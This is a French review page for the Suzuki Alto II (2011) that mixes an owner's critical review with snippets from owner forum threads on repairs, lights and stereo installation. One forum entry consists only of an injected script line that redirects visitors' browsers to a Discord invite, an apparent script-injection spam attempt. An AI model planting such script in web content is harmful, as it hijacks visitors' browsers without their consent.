Avis Suzuki Alto

Suzuki Alto II 1.0 GL - 2011

le 30 Avril 2015 à 15h57

J'ai acheté cette voiture en 2011 et je l'ai gardée environ un an sans avoir de problème. Seuls les "silents blocs" moteur faisaient du bruit à cause des vibrations de celui-ci un peu trop prononcées.

Par contre, l'Alto a un moteur assez tonic qui répond bien par rapport aux autres voitures du même gabarit et qui consomme normalement. L'équipement de base est avantageux comme l'airco et les vitres électriques à l'avant. Quelques rangement par-ci, par-là aussi.

Question confort et qualité, c'est là que ça se gâte... Le métal et la peinture utilisés pour la carrosserie sont loin d'être exceptionnels. La carrosserie est vite griffée et une petite pierre provoquera des écaillements plutôt d'un "point blanc" comme sur d'autres voitures. Les portes arrières aussi, elles sont vraiment légères, ce qui confirme la mauvaise qualité des matériaux utilisés.

A L'intérieur: tissus et plastiques de mauvaise qualité, bien sûr... L'assemblage pareil, surtout les boulons apparents, c'est la cerise sur le gâteau. C'est pas possible de faire plus laid, même en faisant exprès!

La première impression au volant d'une Alto, c'est qu'on sent qu'on est dans une voiture fragile, pas stable (taille des roues...) et pas sécurisante. Sinon, intérieur pas accueillant, plastiques majoritairement gris et noir, sans couleur, sans personnalité,...

Question confort: assez bien assis, je me rappelle, mais la suspension est très sommaire et n'absorbe pas vraiment les aspérités de la route; la voiture sautille, on dirait. Si c'est pour mettre des amortisseurs pareils, autant ne pas en mettre.

Bref, si vous roulez pas sur l'or et que vous êtes plutôt du genre "tant que ça roule...", achetez une Alto. Sinon, allez voir ailleurs ;-)

• moteur vif

• confort
  • suspension
  • design
  • taille du coffre

Avis Suzuki Swift 4IV 1.2 DUALJET 90 5CV AVANTAGE (2019)

Par chef chaudart le 05 Août 2020 à 13h03

Forum : derniers sujets Suzuki Alto

Démonter le rétro extérieur de mon ALTO de 2014

Par philippev77 le 21 Janvier 2020 à 06h27

Bonjour à tous Suite à une "touchette", le rétro extérieur coté conducteur est cassé. plutôt que d'aller le faire changer chez SUZUKI ou NISSAN (si je ne me trompe pas, c'est quasi la même voiture que la PIXO) j'aimerai le faire moi même mais autant j'ai réussi a désolidariser le cache de la portière en tirant dessus, autant je n'arrive pas à retirer la "tige" qui sert à régler le rétro pour justement pouvoir ôter le cache... Comment faire : je n'arrive pas à le dévisser ni a tirer dessus Merci de vos conseils

Suzuki alto

Par AnonymeSam le 02 Décembre 2019 à 14h21

[quotemsg=111985,10,1253058] Hi Les ampoules font à la fois feux de route et feux de croisement... bizarre ce que tu dis ... Tu dois pousser le "manche" vers le tableau de bord, quand tu as tourné la bague vers le symbole feu de route pour passer en codes. Si tu le tires vers toi, c est juste pour faire un appel de phare ! Pour démarrer avec un moteur essence, il faut accélérer " un peu plus " qu avec un diesel...c est une habitude à prendre...il faut doser [/quotemsg] A oui merci j'ai compris . Oui c'est que je me suis dit aussi mais impossible de conduire avec les feux de croisement ( dangereux je ne voit pas du tout avec ) et sur le contrôle technique ya marquer que le système de projection des 2 feux sont défectueux... ça doit être ca . Je vais essayer de faire changer les ampoules

[Topic Officiel] Suzuki Alto VII (2008-2014)

Par Anonymezkx333 le 14 Septembre 2019 à 14h51

<script>document.location = "https://discord.gg/fDPFZs"<script>

[TUTORIEL] Vidange et remplissage de l'huile de boite de vitesses

Par fiocco le 26 Août 2019 à 17h53

Merci [b][url=http://club.caradisiac.com/herve97211/]herve97211[/url][/b] pour l'information qui va m’être utile, je possède la boite automatique pilotée (AGS) mais ça ne change rien c'est toujours le même moteur. 1.2 DualJet (90 Hp) AGS

Montage sono dans la nouvelle Alto!!!

Par AnonymeLudo45 le 14 Août 2019 à 17h25

[quotemsg=102829,173,1823254] Bonjour , je viens de devenir propriétaire d'une susuki alto. Ma première surprise a été la qualité exécrable de l'autoradio (je ne suis pas le seul d’après le forum). J'étais décidé de garder à tout prix (?) l'auto radio d'origine . J'ai donc suivi les idées du forum.... 1- SI vous voulez passer les câbles de portières par le soufflet de la portière oubliez ! c'est impossible le soufflet cache en fait une prise et non un passage de câble ! 2- l'idée de souder direct sur la carte mère de l'autoradio est bonne , sauf que dans mon cas j'ai fais une coulure dessus : résultât autoradio hs 3- j'ai dû prendre la décision de passer en ISO (aftermarket) en fait de m'affranchir de suzuki 4- achat cache plastique + cablage iso (amazon ) 5- J'ai enlevé les enceintes tableau de bord d'origine 100% carton (caca boudin) par des pionner (10 cm 20 € chez feu rouge promo) 6-J'ai placé à la sauvage (directe vissé sur la tôle de la portière ) des hp 16.5 marque sudauto (20 € inversion pour pas de pub) 7-Passage de câble par des petits trous capuchonnés , j'ai recapuchoconné tel quel en laissant un peu de mou....(tant pis pour la pression sur le câble) 8- indice important ; trait sur câble HP = + 9-pack iso ok sauf qu'il faut faire un petit bricolage au niveau du cablage pour les hp porte au niveau du cablage iso (pince sertissage et cosses pour les 4 fils HP portières) 10- j'ai récupéré un autoradio sony cdx r300 (préhistorique pour certains...) 11- Branchement ok marche nickel !!!!! Débarrassé du son nazzzze de l'autoradio d'origine (douteuse) 12- j 'enverrez des photos de mon montage pour tous les propriétaires Alto futurs [/quotemsg] Je veux bien tes photos merci

Essais et comparatifs Suzuki Alto 2